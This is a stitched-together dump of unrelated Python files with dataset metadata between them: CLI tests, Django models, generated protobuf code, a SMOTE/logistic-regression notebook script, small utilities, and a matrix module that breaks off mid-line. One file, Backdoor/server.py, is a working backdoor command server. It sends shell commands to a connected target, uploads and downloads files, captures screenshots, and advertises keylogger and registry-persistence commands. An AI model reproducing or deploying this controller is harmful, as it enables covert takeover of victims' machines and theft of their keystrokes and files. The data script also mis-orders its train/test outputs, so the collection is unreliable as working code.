#!/usr/bin/env python # -*- coding: utf-8 -*- # + # import(s) # - from OcsGenericEntityCli import * # + # + # __doc__ string # _ __doc__ = """test of OcsGenericEntityCli""" # + # function: test_cli() # - def test_cli(): cli = None try: cli = OcsGenericEntityCli() except OcsGenericEntityException: pass if cli: assert True else: assert False # + # function: test_parse_cli() # - def test_parse_cli(): cli = None try: cli = OcsGenericEntityCli() cli.execute() except OcsGenericEntityException as f: print(f.errstr) if cli: assert True else: assert False
#!/usr/bin/env python # -*- coding: utf-8 -*- # + # import(s) # - from OcsGenericEntityCli import * # + # + # __doc__ string # _ __doc__ = """test of OcsGenericEntityCli""" # + # function: test_cli() # - def test_cli(): cli = None try: cli = OcsGenericEntityCli() except OcsGenericEntityException: pass if cli: assert True else: assert False # + # function: test_parse_cli() # - def test_parse_cli(): cli = None try: cli = OcsGenericEntityCli() cli.execute() except OcsGenericEntityException as f: print(f.errstr) if cli: assert True else: assert False
en
0.260135
#!/usr/bin/env python # -*- coding: utf-8 -*- # + # import(s) # - # + # + # __doc__ string # _ test of OcsGenericEntityCli # + # function: test_cli() # - # + # function: test_parse_cli() # -
2.265396
2
signals/signals/apps/related/models.py
gonzaloamadio/django-signals2
0
6623641
from django.conf import settings from django.db import models from django.utils.translation import ugettext_lazy as _ class RelatedModel(models.Model): """ Abstract model with basic info """ title = models.CharField(max_length=128, db_index=True, verbose_name='Name') company = models.ForeignKey('entities.Company', on_delete=models.SET_NULL, verbose_name="Company", null=True, blank=True) class Meta: abstract = True def __str__(self): return self.title class Job(RelatedModel): """ Proposals of jobs Now we are not adding any new field. But we leave it open """ class Meta: verbose_name_plural = 'jobs'
from django.conf import settings from django.db import models from django.utils.translation import ugettext_lazy as _ class RelatedModel(models.Model): """ Abstract model with basic info """ title = models.CharField(max_length=128, db_index=True, verbose_name='Name') company = models.ForeignKey('entities.Company', on_delete=models.SET_NULL, verbose_name="Company", null=True, blank=True) class Meta: abstract = True def __str__(self): return self.title class Job(RelatedModel): """ Proposals of jobs Now we are not adding any new field. But we leave it open """ class Meta: verbose_name_plural = 'jobs'
en
0.837208
Abstract model with basic info Proposals of jobs Now we are not adding any new field. But we leave it open
2.38551
2
Backdoor/server.py
Cyzerx/Penetration-testing-with-Python3
0
6623642
<filename>Backdoor/server.py<gh_stars>0 import socket import termcolor import json import os def reliable_recv(): data = '' while True: try: data = data + target.recv(1024).decode().rstrip() return json.loads(data) except ValueError: continue def reliable_send(data): jsondata = json.dumps(data) target.send(jsondata.encode()) def upload_file(file_name): f = open(file_name, 'rb') target.send(f.read()) def download_file(file_name): f = open(file_name, 'wb') target.settimeout(1) chunk = target.recv(1024) while chunk: f.write(chunk) try: chunk = target.recv(1024) except socket.timeout as e: break target.settimeout(None) f.close() def target_communication(): count = 0 while True: command = input('* Shell~%s: ' % str(ip)) reliable_send(command) if command == 'quit': break elif command == 'clear': os.system('clear') elif command[:3] == 'cd ': pass elif command[:6] == 'upload': upload_file(command[7:]) elif command[:8] == 'download': download_file(command[9:]) elif command[:10] == 'screenshot': f = open('screenshot%d' % (count), 'wb') target.settimeout(3) chunk = target.recv(1024) while chunk: f.write(chunk) try: chunk = target.recv(1024) except socket.timeout as e: break target.settimeout(None) f.close() count += 1 elif command == 'help': print(termcolor.colored('''\n quit --> Quit session with the Target clear --> Clear the Screen cd *Directory Name* --> Changes directory on target system upload *File Name* --> Upload file to the target machine download *File Name* --> Download file from target machine keylog_start --> Start the KeyLogger keylog_dump --> Print KeyStrokes that the target inputted keylog_stop --> Stop and self destruct KeyLogger file presistence *RegName* *FileName* --> Create Persistence in registry (starting automatically on startup)'''),'green') else: result = reliable_recv() print(result) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #IPv4 and TCP connection sock.bind(('127.0.0.1', 5555)) print(termcolor.colored('[+] Listening for the 
incoming Connections', 'green')) sock.listen(5) target, ip = sock.accept() print(termcolor.colored('[+] Target connected from: ' + str(ip), 'green')) target_communication()
<filename>Backdoor/server.py<gh_stars>0 import socket import termcolor import json import os def reliable_recv(): data = '' while True: try: data = data + target.recv(1024).decode().rstrip() return json.loads(data) except ValueError: continue def reliable_send(data): jsondata = json.dumps(data) target.send(jsondata.encode()) def upload_file(file_name): f = open(file_name, 'rb') target.send(f.read()) def download_file(file_name): f = open(file_name, 'wb') target.settimeout(1) chunk = target.recv(1024) while chunk: f.write(chunk) try: chunk = target.recv(1024) except socket.timeout as e: break target.settimeout(None) f.close() def target_communication(): count = 0 while True: command = input('* Shell~%s: ' % str(ip)) reliable_send(command) if command == 'quit': break elif command == 'clear': os.system('clear') elif command[:3] == 'cd ': pass elif command[:6] == 'upload': upload_file(command[7:]) elif command[:8] == 'download': download_file(command[9:]) elif command[:10] == 'screenshot': f = open('screenshot%d' % (count), 'wb') target.settimeout(3) chunk = target.recv(1024) while chunk: f.write(chunk) try: chunk = target.recv(1024) except socket.timeout as e: break target.settimeout(None) f.close() count += 1 elif command == 'help': print(termcolor.colored('''\n quit --> Quit session with the Target clear --> Clear the Screen cd *Directory Name* --> Changes directory on target system upload *File Name* --> Upload file to the target machine download *File Name* --> Download file from target machine keylog_start --> Start the KeyLogger keylog_dump --> Print KeyStrokes that the target inputted keylog_stop --> Stop and self destruct KeyLogger file presistence *RegName* *FileName* --> Create Persistence in registry (starting automatically on startup)'''),'green') else: result = reliable_recv() print(result) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #IPv4 and TCP connection sock.bind(('127.0.0.1', 5555)) print(termcolor.colored('[+] Listening for the 
incoming Connections', 'green')) sock.listen(5) target, ip = sock.accept() print(termcolor.colored('[+] Target connected from: ' + str(ip), 'green')) target_communication()
en
0.651109
\n quit --> Quit session with the Target clear --> Clear the Screen cd *Directory Name* --> Changes directory on target system upload *File Name* --> Upload file to the target machine download *File Name* --> Download file from target machine keylog_start --> Start the KeyLogger keylog_dump --> Print KeyStrokes that the target inputted keylog_stop --> Stop and self destruct KeyLogger file presistence *RegName* *FileName* --> Create Persistence in registry (starting automatically on startup) #IPv4 and TCP connection
2.613954
3
part2/ch11_protocol_buffer/pbuf_message_pb2.py
sorrowhill/17techs
8
6623643
<reponame>sorrowhill/17techs # -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: pbuf_message.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='pbuf_message.proto', package='', syntax='proto3', serialized_options=None, serialized_pb=_b('\n\x12pbuf_message.proto\"\x1a\n\x07Object2\x12\x0f\n\x07number2\x18\x01 \x01(\x03\"1\n\x06Object\x12\x0c\n\x04str2\x18\x01 \x01(\t\x12\x19\n\x07object2\x18\x02 \x01(\x0b\x32\x08.Object2\"\x8b\x01\n\x0fProtobufMessage\x12\x0e\n\x06number\x18\x01 \x01(\x03\x12\n\n\x02pi\x18\x02 \x01(\x01\x12\x0b\n\x03str\x18\x03 \x01(\t\x12\x10\n\x08null_key\x18\x04 \x01(\t\x12\x17\n\x06object\x18\x05 \x01(\x0b\x32\x07.Object\x12\x11\n\tnum_array\x18\x06 \x03(\x03\x12\x11\n\tstr_array\x18\x07 \x03(\tb\x06proto3') ) _OBJECT2 = _descriptor.Descriptor( name='Object2', full_name='Object2', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='number2', full_name='Object2.number2', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=22, serialized_end=48, ) _OBJECT = _descriptor.Descriptor( name='Object', full_name='Object', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='str2', full_name='Object.str2', 
index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='object2', full_name='Object.object2', index=1, number=2, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=50, serialized_end=99, ) _PROTOBUFMESSAGE = _descriptor.Descriptor( name='ProtobufMessage', full_name='ProtobufMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='number', full_name='ProtobufMessage.number', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='pi', full_name='ProtobufMessage.pi', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='str', full_name='ProtobufMessage.str', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='null_key', full_name='ProtobufMessage.null_key', index=3, number=4, type=9, cpp_type=9, label=1, 
has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='object', full_name='ProtobufMessage.object', index=4, number=5, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='num_array', full_name='ProtobufMessage.num_array', index=5, number=6, type=3, cpp_type=2, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='str_array', full_name='ProtobufMessage.str_array', index=6, number=7, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=102, serialized_end=241, ) _OBJECT.fields_by_name['object2'].message_type = _OBJECT2 _PROTOBUFMESSAGE.fields_by_name['object'].message_type = _OBJECT DESCRIPTOR.message_types_by_name['Object2'] = _OBJECT2 DESCRIPTOR.message_types_by_name['Object'] = _OBJECT DESCRIPTOR.message_types_by_name['ProtobufMessage'] = _PROTOBUFMESSAGE _sym_db.RegisterFileDescriptor(DESCRIPTOR) Object2 = _reflection.GeneratedProtocolMessageType('Object2', (_message.Message,), { 'DESCRIPTOR' : _OBJECT2, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:Object2) }) _sym_db.RegisterMessage(Object2) Object = _reflection.GeneratedProtocolMessageType('Object', 
(_message.Message,), { 'DESCRIPTOR' : _OBJECT, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:Object) }) _sym_db.RegisterMessage(Object) ProtobufMessage = _reflection.GeneratedProtocolMessageType('ProtobufMessage', (_message.Message,), { 'DESCRIPTOR' : _PROTOBUFMESSAGE, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:ProtobufMessage) }) _sym_db.RegisterMessage(ProtobufMessage) # @@protoc_insertion_point(module_scope)
# -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: pbuf_message.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() DESCRIPTOR = _descriptor.FileDescriptor( name='pbuf_message.proto', package='', syntax='proto3', serialized_options=None, serialized_pb=_b('\n\x12pbuf_message.proto\"\x1a\n\x07Object2\x12\x0f\n\x07number2\x18\x01 \x01(\x03\"1\n\x06Object\x12\x0c\n\x04str2\x18\x01 \x01(\t\x12\x19\n\x07object2\x18\x02 \x01(\x0b\x32\x08.Object2\"\x8b\x01\n\x0fProtobufMessage\x12\x0e\n\x06number\x18\x01 \x01(\x03\x12\n\n\x02pi\x18\x02 \x01(\x01\x12\x0b\n\x03str\x18\x03 \x01(\t\x12\x10\n\x08null_key\x18\x04 \x01(\t\x12\x17\n\x06object\x18\x05 \x01(\x0b\x32\x07.Object\x12\x11\n\tnum_array\x18\x06 \x03(\x03\x12\x11\n\tstr_array\x18\x07 \x03(\tb\x06proto3') ) _OBJECT2 = _descriptor.Descriptor( name='Object2', full_name='Object2', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='number2', full_name='Object2.number2', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=22, serialized_end=48, ) _OBJECT = _descriptor.Descriptor( name='Object', full_name='Object', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='str2', full_name='Object.str2', index=0, number=1, type=9, 
cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='object2', full_name='Object.object2', index=1, number=2, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=50, serialized_end=99, ) _PROTOBUFMESSAGE = _descriptor.Descriptor( name='ProtobufMessage', full_name='ProtobufMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='number', full_name='ProtobufMessage.number', index=0, number=1, type=3, cpp_type=2, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='pi', full_name='ProtobufMessage.pi', index=1, number=2, type=1, cpp_type=5, label=1, has_default_value=False, default_value=float(0), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='str', full_name='ProtobufMessage.str', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='null_key', full_name='ProtobufMessage.null_key', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, 
default_value=_b("").decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='object', full_name='ProtobufMessage.object', index=4, number=5, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='num_array', full_name='ProtobufMessage.num_array', index=5, number=6, type=3, cpp_type=2, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), _descriptor.FieldDescriptor( name='str_array', full_name='ProtobufMessage.str_array', index=6, number=7, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=102, serialized_end=241, ) _OBJECT.fields_by_name['object2'].message_type = _OBJECT2 _PROTOBUFMESSAGE.fields_by_name['object'].message_type = _OBJECT DESCRIPTOR.message_types_by_name['Object2'] = _OBJECT2 DESCRIPTOR.message_types_by_name['Object'] = _OBJECT DESCRIPTOR.message_types_by_name['ProtobufMessage'] = _PROTOBUFMESSAGE _sym_db.RegisterFileDescriptor(DESCRIPTOR) Object2 = _reflection.GeneratedProtocolMessageType('Object2', (_message.Message,), { 'DESCRIPTOR' : _OBJECT2, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:Object2) }) _sym_db.RegisterMessage(Object2) Object = _reflection.GeneratedProtocolMessageType('Object', (_message.Message,), { 'DESCRIPTOR' : 
_OBJECT, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:Object) }) _sym_db.RegisterMessage(Object) ProtobufMessage = _reflection.GeneratedProtocolMessageType('ProtobufMessage', (_message.Message,), { 'DESCRIPTOR' : _PROTOBUFMESSAGE, '__module__' : 'pbuf_message_pb2' # @@protoc_insertion_point(class_scope:ProtobufMessage) }) _sym_db.RegisterMessage(ProtobufMessage) # @@protoc_insertion_point(module_scope)
en
0.481983
# -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: pbuf_message.proto # @@protoc_insertion_point(imports) # @@protoc_insertion_point(class_scope:Object2) # @@protoc_insertion_point(class_scope:Object) # @@protoc_insertion_point(class_scope:ProtobufMessage) # @@protoc_insertion_point(module_scope)
1.324672
1
Sampling-Techniques/code.py
navinsingh1977/ga-learner-dsmp-repo
0
6623644
# -------------- import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt from sklearn.model_selection import train_test_split # Code starts here df = pd.read_csv(path) #print(df.head()) df.INCOME = df.INCOME.str.replace('$','').str.replace(',','') df.HOME_VAL = df.HOME_VAL.str.replace('$','').str.replace(',','') df.BLUEBOOK = df.BLUEBOOK.str.replace('$','').str.replace(',','') df.OLDCLAIM = df.OLDCLAIM.str.replace('$','').str.replace(',','') df.CLM_AMT = df.CLM_AMT.str.replace('$','').str.replace(',','') print(df.head()) print(df.info()) X = df.iloc[:,:-1] y = df.iloc[:,-1] count = y.value_counts() print(count) X_train, X_test, y_test, y_train = train_test_split(X,y, test_size=0.3, random_state=6) # Code ends here # -------------- # Code starts here X_train.INCOME = X_train.INCOME.astype(float) X_train.HOME_VAL = X_train.HOME_VAL.astype(float) X_train.BLUEBOOK = X_train.BLUEBOOK.astype(float) X_train.OLDCLAIM = X_train.OLDCLAIM.astype(float) X_train.CLM_AMT = X_train.CLM_AMT.astype(float) X_test.INCOME = X_test.INCOME.astype(float) X_test.HOME_VAL = X_test.HOME_VAL.astype(float) X_test.BLUEBOOK = X_test.BLUEBOOK.astype(float) X_test.OLDCLAIM = X_test.OLDCLAIM.astype(float) X_test.CLM_AMT = X_test.CLM_AMT.astype(float) print(X_train.isnull().sum()) print(X_test.isnull().sum()) # Code ends here # -------------- # Code starts here print(X_train.shape) print(X_test.shape) X_train = X_train.dropna(subset=['YOJ','OCCUPATION']) X_test = X_test.dropna(subset=['YOJ','OCCUPATION']) print(X_train.shape) print(X_test.shape) print(y_train.shape) print(y_test.shape) y_train = y_train[X_train.index] y_test = y_test[X_test.index] X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']] = X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']].fillna(X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']].mean(), inplace = True) X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']] = 
X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']].fillna(X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']].mean(), inplace = True) # Code ends here # -------------- from sklearn.preprocessing import LabelEncoder columns = ["PARENT1","MSTATUS","GENDER","EDUCATION","OCCUPATION","CAR_USE","CAR_TYPE","RED_CAR","REVOKED"] # Code starts here for col in columns: le = LabelEncoder() X_train[col] = le.fit_transform(X_train[col].astype(str)) X_test[col] = le.transform(X_test[col].astype(str)) # Code ends here # -------------- from sklearn.metrics import precision_score from sklearn.metrics import accuracy_score from sklearn.linear_model import LogisticRegression # code starts here print(X_train.isnull().sum()) print(y_train.isnull().sum()) model = LogisticRegression(random_state=6) model.fit(X_train,y_train) y_pred = model.predict(X_test) score = accuracy_score(y_test, y_pred) print(score) # Code ends here # -------------- from sklearn.preprocessing import StandardScaler from imblearn.over_sampling import SMOTE # code starts here smote = SMOTE(random_state=9) X_train, y_train = smote.fit_sample(X_train, y_train) scaler = StandardScaler() X_train = scaler.fit_transform(X_train) X_test = scaler.transform(X_test) # Code ends here # -------------- # Code Starts here model = LogisticRegression() model.fit(X_train, y_train) y_pred = model.predict(X_test) score = accuracy_score(y_test, y_pred) print(score) # Code ends here
# -------------- import numpy as np import pandas as pd import seaborn as sns import matplotlib.pyplot as plt from sklearn.model_selection import train_test_split # Code starts here df = pd.read_csv(path) #print(df.head()) df.INCOME = df.INCOME.str.replace('$','').str.replace(',','') df.HOME_VAL = df.HOME_VAL.str.replace('$','').str.replace(',','') df.BLUEBOOK = df.BLUEBOOK.str.replace('$','').str.replace(',','') df.OLDCLAIM = df.OLDCLAIM.str.replace('$','').str.replace(',','') df.CLM_AMT = df.CLM_AMT.str.replace('$','').str.replace(',','') print(df.head()) print(df.info()) X = df.iloc[:,:-1] y = df.iloc[:,-1] count = y.value_counts() print(count) X_train, X_test, y_test, y_train = train_test_split(X,y, test_size=0.3, random_state=6) # Code ends here # -------------- # Code starts here X_train.INCOME = X_train.INCOME.astype(float) X_train.HOME_VAL = X_train.HOME_VAL.astype(float) X_train.BLUEBOOK = X_train.BLUEBOOK.astype(float) X_train.OLDCLAIM = X_train.OLDCLAIM.astype(float) X_train.CLM_AMT = X_train.CLM_AMT.astype(float) X_test.INCOME = X_test.INCOME.astype(float) X_test.HOME_VAL = X_test.HOME_VAL.astype(float) X_test.BLUEBOOK = X_test.BLUEBOOK.astype(float) X_test.OLDCLAIM = X_test.OLDCLAIM.astype(float) X_test.CLM_AMT = X_test.CLM_AMT.astype(float) print(X_train.isnull().sum()) print(X_test.isnull().sum()) # Code ends here # -------------- # Code starts here print(X_train.shape) print(X_test.shape) X_train = X_train.dropna(subset=['YOJ','OCCUPATION']) X_test = X_test.dropna(subset=['YOJ','OCCUPATION']) print(X_train.shape) print(X_test.shape) print(y_train.shape) print(y_test.shape) y_train = y_train[X_train.index] y_test = y_test[X_test.index] X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']] = X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']].fillna(X_train[['AGE','CAR_AGE','INCOME','HOME_VAL']].mean(), inplace = True) X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']] = 
X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']].fillna(X_test[['AGE','CAR_AGE','INCOME','HOME_VAL']].mean(), inplace = True) # Code ends here # -------------- from sklearn.preprocessing import LabelEncoder columns = ["PARENT1","MSTATUS","GENDER","EDUCATION","OCCUPATION","CAR_USE","CAR_TYPE","RED_CAR","REVOKED"] # Code starts here for col in columns: le = LabelEncoder() X_train[col] = le.fit_transform(X_train[col].astype(str)) X_test[col] = le.transform(X_test[col].astype(str)) # Code ends here # -------------- from sklearn.metrics import precision_score from sklearn.metrics import accuracy_score from sklearn.linear_model import LogisticRegression # code starts here print(X_train.isnull().sum()) print(y_train.isnull().sum()) model = LogisticRegression(random_state=6) model.fit(X_train,y_train) y_pred = model.predict(X_test) score = accuracy_score(y_test, y_pred) print(score) # Code ends here # -------------- from sklearn.preprocessing import StandardScaler from imblearn.over_sampling import SMOTE # code starts here smote = SMOTE(random_state=9) X_train, y_train = smote.fit_sample(X_train, y_train) scaler = StandardScaler() X_train = scaler.fit_transform(X_train) X_test = scaler.transform(X_test) # Code ends here # -------------- # Code Starts here model = LogisticRegression() model.fit(X_train, y_train) y_pred = model.predict(X_test) score = accuracy_score(y_test, y_pred) print(score) # Code ends here
en
0.434965
# -------------- # Code starts here #print(df.head()) # Code ends here # -------------- # Code starts here # Code ends here # -------------- # Code starts here # Code ends here # -------------- # Code starts here # Code ends here # -------------- # code starts here # Code ends here # -------------- # code starts here # Code ends here # -------------- # Code Starts here # Code ends here
3.03362
3
api/resolver.py
Babylonpartners/tf-bridge
26
6623645
from .tensor_bridge import \ classify, regress, predict, multi_inference, get_model_metadata OP_DICT = { 'Classify': classify, 'Regress': regress, 'Predict': predict, 'MultiInference': multi_inference, 'GetModelMetadata': get_model_metadata } def tensor_bridge_api_resolver(operation_id): try: return OP_DICT[operation_id] except KeyError: raise AttributeError
from .tensor_bridge import \ classify, regress, predict, multi_inference, get_model_metadata OP_DICT = { 'Classify': classify, 'Regress': regress, 'Predict': predict, 'MultiInference': multi_inference, 'GetModelMetadata': get_model_metadata } def tensor_bridge_api_resolver(operation_id): try: return OP_DICT[operation_id] except KeyError: raise AttributeError
none
1
1.965883
2
scripts/SaveRun.py
jeizenga/shasta
0
6623646
<reponame>jeizenga/shasta #!/usr/bin/python3 import os import shutil import sys # Get from the arguments the list of input fasta files and check that they all exist. helpMessage = "This script copies a run to directories dataOnDisk and DataOnDisk." if not len(sys.argv)==1: print(helpMessage) exit(1) if not os.path.lexists('data'): raise Exception('data does not exist.') if not os.path.lexists('Data'): raise Exception('Data does not exist.') if os.path.lexists('dataOnDisk'): raise Exception('dataOnDisk already exists. Remove before running this script.') if os.path.lexists('DataOnDisk'): raise Exception('DataOnDisk already exists. Remove before running this script.') shutil.copytree('data', 'dataOnDisk') shutil.copytree('Data', 'DataOnDisk')
#!/usr/bin/python3 import os import shutil import sys # Get from the arguments the list of input fasta files and check that they all exist. helpMessage = "This script copies a run to directories dataOnDisk and DataOnDisk." if not len(sys.argv)==1: print(helpMessage) exit(1) if not os.path.lexists('data'): raise Exception('data does not exist.') if not os.path.lexists('Data'): raise Exception('Data does not exist.') if os.path.lexists('dataOnDisk'): raise Exception('dataOnDisk already exists. Remove before running this script.') if os.path.lexists('DataOnDisk'): raise Exception('DataOnDisk already exists. Remove before running this script.') shutil.copytree('data', 'dataOnDisk') shutil.copytree('Data', 'DataOnDisk')
en
0.622196
#!/usr/bin/python3 # Get from the arguments the list of input fasta files and check that they all exist.
2.962282
3
exercises_cv/mundo03/exCV079.py
BeatrizAlcantara/study_repository
0
6623647
# 79 Faça um programa que o usuário forneca vários valores numericos, e cadastre-os em uma lista. Caso o número já exista, ele não será adicionado. No fim, serão exibidos todos os valores únicos digitados, em ordem crescente. def Main079(): numeros = list() resposta = 's' while resposta in ['S','s']: valor = int(input('Digite o valor a ser adicionado: ')) if valor in numeros: print('Esse valor já existe, não será adicionado.') else: print('Valor adicionado com sucesso!') numeros.append(valor) resposta = input('Deseja continuar? [S/N] ').upper() if resposta in ['n','N']: break print(f'Sua lista ficou: {sorted(numeros)}') Main079()
# 79 Faça um programa que o usuário forneca vários valores numericos, e cadastre-os em uma lista. Caso o número já exista, ele não será adicionado. No fim, serão exibidos todos os valores únicos digitados, em ordem crescente. def Main079(): numeros = list() resposta = 's' while resposta in ['S','s']: valor = int(input('Digite o valor a ser adicionado: ')) if valor in numeros: print('Esse valor já existe, não será adicionado.') else: print('Valor adicionado com sucesso!') numeros.append(valor) resposta = input('Deseja continuar? [S/N] ').upper() if resposta in ['n','N']: break print(f'Sua lista ficou: {sorted(numeros)}') Main079()
pt
0.997955
# 79 Faça um programa que o usuário forneca vários valores numericos, e cadastre-os em uma lista. Caso o número já exista, ele não será adicionado. No fim, serão exibidos todos os valores únicos digitados, em ordem crescente.
4.065845
4
matrix.py
RobinNash/Matrix
0
6623648
<reponame>RobinNash/Matrix<gh_stars>0 ## matrix ## ## June, 2021 ## ## By <NAME> ## ''' This module contains Matrix, Vector, and RowOp classes. Matrix objects store entries as fractions and implement matrix operations. Matrix also does more like RREF function implements Gaussian elimination/row reduction to return a matrix in reduced row echelon form. Vector is a subclass of Matrix that implements vector operations. RowOp is a class that breaks down a row operation string to make performing row operations simpler. For example, if the user wants to add 3 * row 2 to row 1 of a 4x5 Matrix M, they can simply pass "R1 + 3*R2" into M.rowop() and the string will be given meaning by the RowOp class. ''' from fractions import Fraction as Frac from math import * # Some math functions for returning values in degrees def dcos(x): return cos(radians(x)) def dtan(x): return tan(radians(x)) def dsin(x): return sin(radians(x)) def dacos(x): return degrees(acos(x)) def dasin(x): return degrees(asin(x)) def datan(x): return degrees(atan(x)) class Matrix(list): '''2D matrix object implements matrix operations and functions Matrix can be initialized by passing a 2D array or a string of form "a b c\nd e f" where a-c are entries of first row and d-f are entries of second row ''' def __init__(self,matrix): super().__init__(matrix) # make each row a Matrix if self and type(self[0]) == list: for i in range(len(self)): self[i] = Matrix([Frac(a) for a in self[i]]) # initialize n,m if matrix is 2D if self and isinstance(self[0],list): self.m,self.n = self.mn() def __repr__(self): return str([[str(c) for c in row] for row in 